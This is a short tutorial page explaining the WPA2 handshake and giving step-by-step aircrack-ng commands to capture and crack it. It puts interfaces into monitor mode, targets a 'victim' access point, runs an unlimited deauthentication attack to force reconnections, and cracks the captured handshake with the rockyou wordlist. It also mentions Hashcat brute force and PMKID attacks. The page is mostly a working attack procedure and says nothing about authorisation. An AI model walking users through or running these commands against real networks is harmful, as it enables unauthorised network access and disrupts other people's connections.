WPA Handshake Capture

What is the WPA2 handshake

The WPA2 handshake is a process that occurs when a client device wants to join a Wi-Fi network secured with WPA2 encryption. It involves the exchange of messages between the client device and the access point (AP) to establish a secure connection. During the handshake, the client device and AP authenticate each other's identities, negotiate encryption keys, and establish a secure communication channel. This process helps prevent unauthorized access to the network and ensures that data transmitted over the network is encrypted and protected. The WPA2 handshake is a crucial security measure in Wi-Fi networks and helps safeguard against unauthorized access and data interception.

Steps to follow to capture and crack the WPA2 handshake

  1. kill conflict in prosses of the WIFI

sudo airmon-ng check kill
  1. Start monitor mode

sudo airmon-ng start [interface]
  1. Get the Victim's MAC address and channel

sudo airodump-ng [interface]

you can display only the victim AP

sudo airodump-ng [interface] -d [victim mac adress]
  1. Now you should use two different

  • first window

sudo airodump-ng -w hack1 -c [victim channel number] --bssid [victim mac adress] [interface]
  • second window : deauth attack

sudo aireplay-ng --deauth 0 -a [victim mac adress] [interface]

then you should stop both windows bu just pressing Ctrl + C

  1. Use Wireshark to open hack1 file

wireshark hack1-01.cap

Filter Wireshark messages for EAPOL

  1. Stop monitor mode

sudo airmon-ng stop [interface]
  1. Crack file with Rockyou or other wordlist

aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

Make sure you have rockyou in text format (you can unzip file directly on Kali)

you can you any other word list to crack the file

If you can't crack the file using wordlist you can brute force it using Hashcat

for more details check:

in case no is connected to the WIFI we are obliged to use an PMKID Attack

Other YouTube Tutorials

You can check those YouTube Videos/Tutorials about WPA Handshake Capture:

Last updated